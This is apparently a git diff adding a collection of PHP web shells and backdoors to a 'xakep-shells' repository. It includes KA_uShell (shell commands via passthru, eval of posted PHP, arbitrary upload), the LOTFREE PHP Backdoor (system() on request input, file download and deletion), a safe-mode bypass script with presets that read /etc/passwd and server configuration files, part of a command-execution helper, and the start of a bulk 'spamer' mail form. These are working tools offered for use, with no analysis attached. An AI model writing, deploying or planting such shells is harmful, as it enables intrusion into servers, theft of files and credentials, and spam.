$port[32779] = "rpc.cmsd";
|
||||
$port[38036] = "timestep";
|
||||
$port[40193] = "Novell";
|
||||
$port[41524] = "arcserve discovery";
|
||||
////////////////////////////////////////////////////////////////////////////////
|
||||
////////////////////////////////ÔÓÍÊÖÈÈ/////////////////////////////////////////
|
||||
///////////////////////////////////////////////////////////////////////////////
|
||||
function rep_char($ch,$count) //Ïîâòîðåíèå ñèìâîëà
|
||||
{
|
||||
$res="";
|
||||
for($i=0; $i<=$count; ++$i){
|
||||
$res.=$ch."";
|
||||
}
|
||||
return $res;
|
||||
}
|
||||
function ex($comd) //Âûïîëíåíèå êîìàíäû
|
||||
{
|
||||
$res = '';
|
||||
if (!empty($comd)){
|
||||
if(function_exists('exec')){
|
||||
exec($comd,$res);
|
||||
$res=implode("\n",$res);
|
||||
}elseif(function_exists('shell_exec')){
|
||||
$res=shell_exec($comd);
|
||||
}elseif(function_exists('system')){
|
||||
ob_start();
|
||||
system($comd);
|
||||
$res=ob_get_contents();
|
||||
ob_end_clean();
|
||||
}elseif(function_exists('passthru')){
|
||||
ob_start();
|
||||
passthru($comd);
|
||||
$res=ob_get_contents();
|
||||
ob_end_clean();
|
||||
}elseif(is_resource($f=popen($comd,"r"))){
|
||||
$res = "";
|
||||
while(!feof($f)) { $res.=fread($f,1024); }
|
||||
pclose($f);
|
||||
}
|
||||
}
|
||||
return $res;
|
||||
}
|
||||
function sysinfo() //Âûâîä SYSINFO
|
||||
{
|
||||
global $curl_on, $dis_func, $mysql_stat, $safe_mode, $server, $HTTP_SERVER_VARS;
|
||||
echo("<b><font face=Verdana size=2> System information:<br><font size=-2>
|
||||
<hr>");
|
||||
echo (($safe_mode)?("Safe Mode: </b><font color=green>ON</font><b> "):
|
||||
("Safe Mode: </b><font color=red>OFF</font><b> "));
|
||||
$row_dis_func=explode(', ',$dis_func);
|
||||
echo ("PHP: </b><font color=blue>".phpversion()."</font><b> ");
|
||||
echo ("MySQL: </b>");
|
||||
if($mysql_stat){
|
||||
echo "<font color=green>ON </font><b>";
|
||||
}
|
||||
else {
|
||||
echo "<font color=red>OFF </font><b>";
|
||||
}
|
||||
echo "cURL: </b>";
|
||||
if($curl_on){
|
||||
echo "<font color=green>ON</font><b><br>";
|
||||
}else
|
||||
echo "<font color=red>OFF</font><b><br>";
|
||||
if ($dis_func!=""){
|
||||
echo "Disabled Functions: </b><font color=red>".$dis_func."</font><br><b>";
|
||||
}
|
||||
$uname=ex('uname -a');
|
||||
echo "OS: </b><font color=blue>";
|
||||
if (empty($uname)){
|
||||
echo (php_uname()."</font><br><b>");
|
||||
}else
|
||||
echo $uname."</font><br><b>";
|
||||
$id = ex('id');
|
||||
echo "SERVER: </b><font color=blue>".$server."</font><br><b>";
|
||||
echo "id: </b><font color=blue>";
|
||||
if (!empty($id)){
|
||||
echo $id."</font><br><b>";
|
||||
}else
|
||||
echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid().
|
||||
"</font><br><b>";
|
||||
echo "<b>RemoteAddress:</b><font color=red>".$HTTP_SERVER_VARS['REMOTE_ADDR']."</font><br>";
|
||||
if(isset($HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR'])){
|
||||
echo "<b>RemoteAddressIfProxy:</b><font color=red>".$HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR']."</font>";
|
||||
}
|
||||
echo "<hr size=3 color=black>";
|
||||
echo "</font></font>";
|
||||
}
|
||||
function read_dir($dir) //÷èòàåì ïàïêó
|
||||
{
|
||||
$d=opendir($dir);
|
||||
$i=0;
|
||||
while($r=readdir($d)){
|
||||
$res[$i]=$r;
|
||||
$i++;
|
||||
}
|
||||
return $res;
|
||||
}
|
||||
function permissions($mode,$file) { //îïðåäåëåíèå ñâîéñòâ
|
||||
$type=filetype($file);
|
||||
$perms=$type[0];
|
||||
$perms.=($mode & 00400) ? "r" : "-";
|
||||
$perms.=($mode & 00200) ? "w" : "-";
|
||||
$perms.=($mode & 00100) ? "x" : "-";
|
||||
$perms.=($mode & 00040) ? "r" : "-";
|
||||
$perms.=($mode & 00020) ? "w" : "-";
|
||||
$perms.=($mode & 00010) ? "x" : "-";
|
||||
$perms.=($mode & 00004) ? "r" : "-";
|
||||
$perms.=($mode & 00002) ? "w" : "-";
|
||||
$perms.=($mode & 00001) ? "x" : "-";
|
||||
$perms.="(".$mode.")";
|
||||
return $perms;
|
||||
}
|
||||
function open_file($fil, $m, $d) //Îòêðûòü ôàéë
|
||||
{
|
||||
if (!($fp=fopen($fil,$m))) {
|
||||
$res="Error opening file!\n";
|
||||
}else{
|
||||
ob_start();
|
||||
readfile($fil);
|
||||
$res=ob_get_contents();
|
||||
ob_end_clean();
|
||||
if (!(fclose($fp))){
|
||||
$res="ERROR CLOSE";
|
||||
}
|
||||
}
|
||||
echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
|
||||
echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
|
||||
echo "<table BORDER=1 align=center>";
|
||||
echo "<tr><td alling=center><b> ".$fil." </b></td></tr>";
|
||||
echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
|
||||
echo $res;
|
||||
echo "
|
229
xakep-shells/PHP/KA_uShell.php.php.txt
Normal file
229
xakep-shells/PHP/KA_uShell.php.php.txt
Normal file
|
@ -0,0 +1,229 @@
|
|||
<!--
|
||||
|
||||
/+--------------------------------+\
|
||||
| KA_uShell |
|
||||
| <KAdot Universal Shell> |
|
||||
| Version 0.1.6 |
|
||||
| 13.03.04 |
|
||||
| Author: KAdot <KAdot@ngs.ru> |
|
||||
|--------------------------------|
|
||||
\+ +/
|
||||
|
||||
-->
|
||||
<html>
|
||||
<head>
|
||||
<title>KA_uShell 0.1.6</title>
|
||||
<style type="text/css">
|
||||
<!--
|
||||
body, table{font-family:Verdana; font-size:12px;}
|
||||
table {background-color:#EAEAEA; border-width:0px;}
|
||||
b {font-family:Arial; font-size:15px;}
|
||||
a{text-decoration:none;}
|
||||
-->
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<?php
|
||||
$self = $_SERVER['PHP_SELF'];
|
||||
$docr = $_SERVER['DOCUMENT_ROOT'];
|
||||
$sern = $_SERVER['SERVER_NAME'];
|
||||
$tend = "</tr></form></table><br><br><br><br>";
|
||||
|
||||
// Configuration
|
||||
$login = "admin";
|
||||
$pass = "123";
|
||||
|
||||
|
||||
/*/ Authentication
|
||||
if (!isset($_SERVER['PHP_AUTH_USER'])) {
|
||||
header('WWW-Authenticate: Basic realm="KA_uShell"');
|
||||
header('HTTP/1.0 401 Unauthorized');
|
||||
exit;}
|
||||
|
||||
else {
|
||||
if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login)
|
||||
{ echo "×òî íàäî?"; exit;}
|
||||
}
|
||||
*/
|
||||
|
||||
|
||||
|
||||
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
|
||||
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
|
||||
else {$ac = "shell";}
|
||||
|
||||
// Menu
|
||||
echo "
|
||||
|<a href=$self?ac=shell>Shell</a>|
|
||||
|<a href=$self?ac=upload>File Upload</a>|
|
||||
|<a href=$self?ac=tools>Tools</a>|
|
||||
|<a href=$self?ac=eval>PHP Eval Code</a>|
|
||||
|<a href=$self?ac=whois>Whois</a>|
|
||||
<br><br><br><pre>";
|
||||
|
||||
|
||||
switch($ac) {
|
||||
|
||||
// Shell
|
||||
case "shell":
|
||||
|
||||
echo <<<HTML
|
||||
<b>Shell</b>
|
||||
<table>
|
||||
<form action="$self" method="POST">
|
||||
<input type="hidden" name="ac" value="shell">
|
||||
<tr><td>
|
||||
$$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter">
|
||||
</td></tr>
|
||||
<tr><td>
|
||||
<textarea cols="100" rows="25">
|
||||
HTML;
|
||||
|
||||
if (!empty($_POST['c'])){
|
||||
passthru($_POST['c']);
|
||||
}
|
||||
echo "</textarea></td>$tend";
|
||||
break;
|
||||
|
||||
|
||||
//PHP Eval Code execution
|
||||
case "eval":
|
||||
|
||||
echo <<<HTML
|
||||
<b>PHP Eval Code</b>
|
||||
<table>
|
||||
<form method="POST" action="$self">
|
||||
<input type="hidden" name="ac" value="eval">
|
||||
<tr>
|
||||
<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td><input type="submit" value="Enter"></td>
|
||||
$tend
|
||||
HTML;
|
||||
|
||||
if (isset($_POST['ephp'])){
|
||||
eval($_POST['ephp']);
|
||||
}
|
||||
break;
|
||||
|
||||
|
||||
//Text tools
|
||||
case "tools":
|
||||
|
||||
echo <<<HTML
|
||||
<b>Tools</b>
|
||||
<table>
|
||||
<form method="POST" action="$self">
|
||||
<input type="hidden" name="ac" value="tools">
|
||||
<tr>
|
||||
<td>
|
||||
<input type="radio" name="tac" value="1">B64 Decode<br>
|
||||
<input type="radio" name="tac" value="2">B64 Encode<br><hr>
|
||||
<input type="radio" name="tac" value="3">md5 Hash
|
||||
</td>
|
||||
<td><textarea name="tot" rows="5" cols="42"></textarea></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td> </td>
|
||||
<td><input type="submit" value="Enter"></td>
|
||||
$tend
|
||||
HTML;
|
||||
|
||||
if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
|
||||
|
||||
switch($_POST['tac']) {
|
||||
|
||||
case "1":
|
||||
echo "Ðàñêîäèðîâàííûé òåêñò:<b>" .base64_decode($_POST['tot']). "</b>";
|
||||
break;
|
||||
|
||||
case "2":
|
||||
echo "Êîäèðîâàííûé òåêñò:<b>" .base64_encode($_POST['tot']). "</b>";
|
||||
break;
|
||||
|
||||
case "3":
|
||||
echo "Êîäèðîâàííûé òåêñò:<b>" .md5($_POST['tot']). "</b>";
|
||||
break;
|
||||
}}
|
||||
break;
|
||||
|
||||
|
||||
// Uploading
|
||||
case "upload":
|
||||
|
||||
echo <<<HTML
|
||||
<b>File Upload</b>
|
||||
<table>
|
||||
<form enctype="multipart/form-data" action="$self" method="POST">
|
||||
<input type="hidden" name="ac" value="upload">
|
||||
<tr>
|
||||
<td>Ôàéëî:</td>
|
||||
<td><input size="48" name="file" type="file"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Ïàïêà:</td>
|
||||
<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td>
|
||||
$tend
|
||||
HTML;
|
||||
|
||||
if (isset($_POST['path'])){
|
||||
|
||||
$uploadfile = $_POST['path'].$_FILES['file']['name'];
|
||||
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
|
||||
|
||||
if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
|
||||
echo "Ôàéëî óñïåøíî çàãðóæåí â ïàïêó $uploadfile\n";
|
||||
echo "Èìÿ:" .$_FILES['file']['name']. "\n";
|
||||
echo "Ðàçìåð:" .$_FILES['file']['size']. "\n";
|
||||
|
||||
} else {
|
||||
print "Íå óäà¸òñÿ çàãðóçèòü ôàéëî. Èíôà:\n";
|
||||
print_r($_FILES);
|
||||
}
|
||||
}
|
||||
break;
|
||||
|
||||
|
||||
// Whois
|
||||
case "whois":
|
||||
echo <<<HTML
|
||||
<b>Whois</b>
|
||||
<table>
|
||||
<form action="$self" method="POST">
|
||||
<input type="hidden" name="ac" value="whois">
|
||||
<tr>
|
||||
<td>Äîìåí:</td>
|
||||
<td><input size="40" type="text" name="wq"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Õóéç ñåðâåð:</td>
|
||||
<td><input size="40" type="text" name="wser" value="whois.ripe.net"></td>
|
||||
</tr>
|
||||
<tr><td>
|
||||
<input align="right" type="submit" value="Enter">
|
||||
</td></tr>
|
||||
$tend
|
||||
HTML;
|
||||
|
||||
if (isset($_POST['wq']) && $_POST['wq']<>"") {
|
||||
|
||||
if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
|
||||
|
||||
$querty = $_POST['wq']."\r\n";
|
||||
$fp = fsockopen($wser, 43);
|
||||
|
||||
if (!$fp) {echo "Íå ìîãó îòêðûòü ñîêåò";} else {
|
||||
fputs($fp, $querty);
|
||||
while(!feof($fp)){echo fgets($fp, 4000);}
|
||||
fclose($fp);
|
||||
}}
|
||||
break;
|
||||
|
||||
|
||||
}
|
||||
?>
|
||||
</pre>
|
||||
</body>
|
||||
</html>
|
229
xakep-shells/PHP/KAdot Universal Shell v0.1.6.html.txt
Normal file
229
xakep-shells/PHP/KAdot Universal Shell v0.1.6.html.txt
Normal file
|
@ -0,0 +1,229 @@
|
|||
<!--
|
||||
|
||||
/+--------------------------------+\
|
||||
| KA_uShell |
|
||||
| <KAdot Universal Shell> |
|
||||
| Version 0.1.6 |
|
||||
| 13.03.04 |
|
||||
| Author: KAdot <KAdot@ngs.ru> |
|
||||
|--------------------------------|
|
||||
\+ +/
|
||||
|
||||
-->
|
||||
<html>
|
||||
<head>
|
||||
<title>KA_uShell 0.1.6</title>
|
||||
<style type="text/css">
|
||||
<!--
|
||||
body, table{font-family:Verdana; font-size:12px;}
|
||||
table {background-color:#EAEAEA; border-width:0px;}
|
||||
b {font-family:Arial; font-size:15px;}
|
||||
a{text-decoration:none;}
|
||||
-->
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<?php
|
||||
$self = $_SERVER['PHP_SELF'];
|
||||
$docr = $_SERVER['DOCUMENT_ROOT'];
|
||||
$sern = $_SERVER['SERVER_NAME'];
|
||||
$tend = "</tr></form></table><br><br><br><br>";
|
||||
|
||||
// Configuration
|
||||
$login = "admin";
|
||||
$pass = "123";
|
||||
|
||||
|
||||
/*/ Authentication
|
||||
if (!isset($_SERVER['PHP_AUTH_USER'])) {
|
||||
header('WWW-Authenticate: Basic realm="KA_uShell"');
|
||||
header('HTTP/1.0 401 Unauthorized');
|
||||
exit;}
|
||||
|
||||
else {
|
||||
if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login)
|
||||
{ echo "×òî íàäî?"; exit;}
|
||||
}
|
||||
*/
|
||||
|
||||
|
||||
|
||||
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
|
||||
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
|
||||
else {$ac = "shell";}
|
||||
|
||||
// Menu
|
||||
echo "
|
||||
|<a href=$self?ac=shell>Shell</a>|
|
||||
|<a href=$self?ac=upload>File Upload</a>|
|
||||
|<a href=$self?ac=tools>Tools</a>|
|
||||
|<a href=$self?ac=eval>PHP Eval Code</a>|
|
||||
|<a href=$self?ac=whois>Whois</a>|
|
||||
<br><br><br><pre>";
|
||||
|
||||
|
||||
switch($ac) {
|
||||
|
||||
// Shell
|
||||
case "shell":
|
||||
|
||||
echo <<<HTML
|
||||
<b>Shell</b>
|
||||
<table>
|
||||
<form action="$self" method="POST">
|
||||
<input type="hidden" name="ac" value="shell">
|
||||
<tr><td>
|
||||
$$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter">
|
||||
</td></tr>
|
||||
<tr><td>
|
||||
<textarea cols="100" rows="25">
|
||||
HTML;
|
||||
|
||||
if (!empty($_POST['c'])){
|
||||
passthru($_POST['c']);
|
||||
}
|
||||
echo "</textarea></td>$tend";
|
||||
break;
|
||||
|
||||
|
||||
//PHP Eval Code execution
|
||||
case "eval":
|
||||
|
||||
echo <<<HTML
|
||||
<b>PHP Eval Code</b>
|
||||
<table>
|
||||
<form method="POST" action="$self">
|
||||
<input type="hidden" name="ac" value="eval">
|
||||
<tr>
|
||||
<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td><input type="submit" value="Enter"></td>
|
||||
$tend
|
||||
HTML;
|
||||
|
||||
if (isset($_POST['ephp'])){
|
||||
eval($_POST['ephp']);
|
||||
}
|
||||
break;
|
||||
|
||||
|
||||
//Text tools
|
||||
case "tools":
|
||||
|
||||
echo <<<HTML
|
||||
<b>Tools</b>
|
||||
<table>
|
||||
<form method="POST" action="$self">
|
||||
<input type="hidden" name="ac" value="tools">
|
||||
<tr>
|
||||
<td>
|
||||
<input type="radio" name="tac" value="1">B64 Decode<br>
|
||||
<input type="radio" name="tac" value="2">B64 Encode<br><hr>
|
||||
<input type="radio" name="tac" value="3">md5 Hash
|
||||
</td>
|
||||
<td><textarea name="tot" rows="5" cols="42"></textarea></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td> </td>
|
||||
<td><input type="submit" value="Enter"></td>
|
||||
$tend
|
||||
HTML;
|
||||
|
||||
if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
|
||||
|
||||
switch($_POST['tac']) {
|
||||
|
||||
case "1":
|
||||
echo "Ðàñêîäèðîâàííûé òåêñò:<b>" .base64_decode($_POST['tot']). "</b>";
|
||||
break;
|
||||
|
||||
case "2":
|
||||
echo "Êîäèðîâàííûé òåêñò:<b>" .base64_encode($_POST['tot']). "</b>";
|
||||
break;
|
||||
|
||||
case "3":
|
||||
echo "Êîäèðîâàííûé òåêñò:<b>" .md5($_POST['tot']). "</b>";
|
||||
break;
|
||||
}}
|
||||
break;
|
||||
|
||||
|
||||
// Uploading
|
||||
case "upload":
|
||||
|
||||
echo <<<HTML
|
||||
<b>File Upload</b>
|
||||
<table>
|
||||
<form enctype="multipart/form-data" action="$self" method="POST">
|
||||
<input type="hidden" name="ac" value="upload">
|
||||
<tr>
|
||||
<td>Ôàéëî:</td>
|
||||
<td><input size="48" name="file" type="file"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Ïàïêà:</td>
|
||||
<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td>
|
||||
$tend
|
||||
HTML;
|
||||
|
||||
if (isset($_POST['path'])){
|
||||
|
||||
$uploadfile = $_POST['path'].$_FILES['file']['name'];
|
||||
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
|
||||
|
||||
if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
|
||||
echo "Ôàéëî óñïåøíî çàãðóæåí â ïàïêó $uploadfile\n";
|
||||
echo "Èìÿ:" .$_FILES['file']['name']. "\n";
|
||||
echo "Ðàçìåð:" .$_FILES['file']['size']. "\n";
|
||||
|
||||
} else {
|
||||
print "Íå óäà¸òñÿ çàãðóçèòü ôàéëî. Èíôà:\n";
|
||||
print_r($_FILES);
|
||||
}
|
||||
}
|
||||
break;
|
||||
|
||||
|
||||
// Whois
|
||||
case "whois":
|
||||
echo <<<HTML
|
||||
<b>Whois</b>
|
||||
<table>
|
||||
<form action="$self" method="POST">
|
||||
<input type="hidden" name="ac" value="whois">
|
||||
<tr>
|
||||
<td>Äîìåí:</td>
|
||||
<td><input size="40" type="text" name="wq"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Õóéç ñåðâåð:</td>
|
||||
<td><input size="40" type="text" name="wser" value="whois.ripe.net"></td>
|
||||
</tr>
|
||||
<tr><td>
|
||||
<input align="right" type="submit" value="Enter">
|
||||
</td></tr>
|
||||
$tend
|
||||
HTML;
|
||||
|
||||
if (isset($_POST['wq']) && $_POST['wq']<>"") {
|
||||
|
||||
if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
|
||||
|
||||
$querty = $_POST['wq']."\r\n";
|
||||
$fp = fsockopen($wser, 43);
|
||||
|
||||
if (!$fp) {echo "Íå ìîãó îòêðûòü ñîêåò";} else {
|
||||
fputs($fp, $querty);
|
||||
while(!feof($fp)){echo fgets($fp, 4000);}
|
||||
fclose($fp);
|
||||
}}
|
||||
break;
|
||||
|
||||
|
||||
}
|
||||
?>
|
||||
</pre>
|
||||
</body>
|
||||
</html>
|
133
xakep-shells/PHP/LOTFREE.php.php.txt
Normal file
133
xakep-shells/PHP/LOTFREE.php.php.txt
Normal file
|
@ -0,0 +1,133 @@
|
|||
<?php
|
||||
function good_link($link)
|
||||
{
|
||||
$link=ereg_replace("/+","/",$link);
|
||||
$link=ereg_replace("/[^/(..)]+/\.\.","/",$link);
|
||||
$link=ereg_replace("/+","/",$link);
|
||||
if(!strncmp($link,"./",2) && strlen($link)>2)$link=substr($link,2);
|
||||
if($link=="")$link=".";
|
||||
return $link;
|
||||
}
|
||||
|
||||
$dir=isset($_REQUEST['dir'])?$_REQUEST['dir']:".";
|
||||
$dir=good_link($dir);
|
||||
$rep=opendir($dir);
|
||||
chdir($dir);
|
||||
|
||||
if(isset($_REQUEST["down"]) && $_REQUEST["down"]!="")
|
||||
{
|
||||
header("Content-Type: application/octet-stream");
|
||||
header("Content-Length: ".filesize($_REQUEST["down"]));
|
||||
header("Content-Disposition: attachment; filename=".basename($_REQUEST["down"]));
|
||||
readfile($_REQUEST["down"]);
|
||||
exit();
|
||||
}
|
||||
?>
|
||||
<html>
|
||||
<head><title>LOTFREE PHP Backdoor v1.5</title></head>
|
||||
<body>
|
||||
<br>
|
||||
<?php
|
||||
echo "Actuellement dans <b>".getcwd()."</b><br>\n";
|
||||
echo "<b>dir = '$dir'</b><br>\n";
|
||||
echo "Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez sur une croix pour effacer un fichier !<br><br>\n";
|
||||
|
||||
if(isset($_REQUEST['cmd']) && $_REQUEST['cmd']!="")
|
||||
{
|
||||
echo "<pre>\n";
|
||||
system($_REQUEST['cmd']);
|
||||
echo "</pre>\n";
|
||||
}
|
||||
|
||||
if(isset($_FILES["fic"]["name"]) && isset($_POST["MAX_FILE_SIZE"]))
|
||||
{
|
||||
if($_FILES["fic"]["size"]<$_POST["MAX_FILE_SIZE"])
|
||||
{
|
||||
if(move_uploaded_file($_FILES["fic"]["tmp_name"],good_link("./".$_FILES["fic"]["name"])))
|
||||
{
|
||||
echo "fichier telecharge dans ".good_link("./".$_FILES["fic"]["name"])."!<br>\n";
|
||||
}
|
||||
else echo "upload failed: ".$_FILES["fic"]["error"]."<br>\n";
|
||||
}
|
||||
else echo "fichier trop gros!<br>\n";
|
||||
}
|
||||
|
||||
if(isset($_REQUEST['rm']) && $_REQUEST['rm']!="")
|
||||
{
|
||||
if(unlink($_REQUEST['rm']))echo "fichier ".$_REQUEST['rm']." efface !<br>\n";
|
||||
else echo "Impossible de supprimer le fichier<br>\n";
|
||||
}
|
||||
|
||||
?>
|
||||
<hr>
|
||||
<table align="center" width="95%" border="0" cellspacing="0" bgcolor="lightblue">
|
||||
<?php
|
||||
$t_dir=array();
|
||||
$t_file=array();
|
||||
$i_dir=0;
|
||||
$i_file=0;
|
||||
while($x=readdir($rep))
|
||||
{
|
||||
if(is_dir($x))$t_dir[$i_dir++]=$x;
|
||||
else $t_file[$i_file++]=$x;
|
||||
}
|
||||
closedir($rep);
|
||||
while(1)
|
||||
{
|
||||
?>
|
||||
<tr>
|
||||
<td width="20%" bgcolor="lightgray" valign="top">
|
||||
<?php
|
||||
if($x=each($t_dir))
|
||||
{
|
||||
$name=$x["value"];
|
||||
if($name=='.'){}
|
||||
elseif($name=='..') echo " <a href='".$_SERVER['PHP_SELF']."?dir=".good_link("$dir/../")."'>UP</a><br><br>\n";
|
||||
else echo " <a href='".$_SERVER['PHP_SELF']."?dir=".good_link("$dir/$name")."'>".$name."</a>\n";
|
||||
}
|
||||
?>
|
||||
</td>
|
||||
<td width='78%'<?php
|
||||
if($y=each($t_file))
|
||||
{
|
||||
if($y["key"]%2==0)echo " bgcolor='lightgreen'>\n";
|
||||
else echo ">\n";
|
||||
echo " <a href='".$_SERVER['PHP_SELF']."?dir=$dir&down=".$y["value"]."'>".$y["value"]."</a>\n";
|
||||
}
|
||||
else echo ">\n";
|
||||
?>
|
||||
</td>
|
||||
<td valign='center' width='2%'<?php
|
||||
if($y)
|
||||
{
|
||||
if($y["key"]%2==0)echo " bgcolor='lightgreen'";
|
||||
echo "><a href='".$_SERVER['PHP_SELF']."?dir=$dir&rm=".$y["value"]."'><b>X</b></a>";
|
||||
}
|
||||
else echo ">\n";
|
||||
?></td>
|
||||
</tr>
|
||||
<?php
|
||||
if(!$x && !$y)break;
|
||||
}
|
||||
?>
|
||||
</table>
|
||||
<hr>
|
||||
<br>
|
||||
<a href="<?php echo $_SERVER['PHP_SELF']; ?>?dir=">revenir au repertoire d'origine</a><br><br>
|
||||
<form method="post" action="<?php echo $_SERVER['PHP_SELF']."?dir=$dir"; ?>">
|
||||
Executer une commande <input type="text" name="cmd"> <input type="submit" value="g0!">
|
||||
</form><br>
|
||||
Uploader un fichier dans le repertoire courant :<br>
|
||||
<form enctype="multipart/form-data" method="post" action="<?php echo $_SERVER['PHP_SELF']."?dir=$dir"; ?>">
|
||||
<input type="file" name="fic"><input type="hidden" name="MAX_FILE_SIZE" value="100000">
|
||||
<input type="submit" value="upl0ad!"></form><br>
|
||||
<br>
|
||||
<center>
|
||||
PHP Backdoor Version 1.5<br>
|
||||
by sirius_black / LOTFREE TEAM<br>
|
||||
Execute commands, browse the filesystem<br>
|
||||
Upload, download and delete files...<br>
|
||||
<a href="http://www.lsdp.net/~lotfree">http://www.lsdp.net/~lotfree</a><br>
|
||||
</center>
|
||||
</body>
|
||||
</html>
|
|
@ -0,0 +1,34 @@
|
|||
<?
|
||||
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit</font></b><br>";
|
||||
print_r('
|
||||
<pre>
|
||||
<form method="POST" action="">
|
||||
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="Çalýþtýr" type="submit">
|
||||
</form>
|
||||
<form method="POST" action="">
|
||||
<b><font color=blue>Hýzlý Menü :=) :</font><select size="1" name="liz0">
|
||||
<option value="cat /etc/passwd">/etc/passwd</option>
|
||||
<option value="netstat -an | grep -i listen">Tüm Açýk Portalarý Gör</option>
|
||||
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
|
||||
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
|
||||
<option value="cat /etc/hosts">/etc/hosts</option>
|
||||
<option value="cat /etc/named.conf">/etc/named.conf</option>
|
||||
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
|
||||
</select> <input type="submit" value="Göster Bakim">
|
||||
</form>
|
||||
</pre>
|
||||
');
|
||||
ini_restore("safe_mode");
|
||||
ini_restore("open_basedir");
|
||||
$liz0=shell_exec($_POST[baba]);
|
||||
$liz0zim=shell_exec($_POST[liz0]);
|
||||
$uid=shell_exec('id');
|
||||
$server=shell_exec('uname -a');
|
||||
echo "<pre><h4>";
|
||||
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>";
|
||||
echo "<b><font color=red>Server</font></b>:$server<br>";
|
||||
echo "<b><font color=red>Komut Sonuçlarý:</font></b><br>";
|
||||
echo $liz0;
|
||||
echo $liz0zim;
|
||||
echo "</h4></pre>";
|
||||
?>
|
182
xakep-shells/PHP/Moroccan Spamers Ma-EditioN By GhOsT.php.txt
Normal file
182
xakep-shells/PHP/Moroccan Spamers Ma-EditioN By GhOsT.php.txt
Normal file
|
@ -0,0 +1,182 @@
|
|||
<?
|
||||
if ($action=="send"){
|
||||
$message = urlencode($message);
|
||||
$message = ereg_replace("%5C%22", "%22", $message);
|
||||
$message = urldecode($message);
|
||||
$message = stripslashes($message);
|
||||
$subject = stripslashes($subject);
|
||||
}
|
||||
|
||||
?>
|
||||
<form name="form1" method="post" action="" enctype="multipart/form-data">
|
||||
<div align="center">
|
||||
<center>
|
||||
<table border="2" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#006699" width="74%" id="AutoNumber1">
|
||||
<tr>
|
||||
<td width="100%">
|
||||
<div align="center">
|
||||
<center>
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2">
|
||||
<tr>
|
||||
<td width="100%">
|
||||
<p align="center"><div align="center">
|
||||
<center>
|
||||
<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#336699" width="70%" cellpadding="0" id="AutoNumber1" height="277">
|
||||
<tr>
|
||||
<td width="100%" height="272">
|
||||
<table width="769" border="0" height="303">
|
||||
<tr>
|
||||
<td width="786" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic3.gif" colspan="3" height="28">
|
||||
<p align="center"><b><font face="Tahoma" size="2" color="#FF6600"> Moroccan Spamers Ma-EditioN By GhOsT </font></b></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="79" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" align="right">
|
||||
<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your
|
||||
Email:</font></div>
|
||||
</td>
|
||||
<td width="390" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
|
||||
<input name="from" value="<? print $from; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your
|
||||
Name:</font></div>
|
||||
</td>
|
||||
<td width="317" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" valign="middle"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
|
||||
<input type="text" name="realname" value="<? print $realname; ?>" size="30">
|
||||
</font></td>
|
||||
</tr>
|
||||
<tr>
|
||||
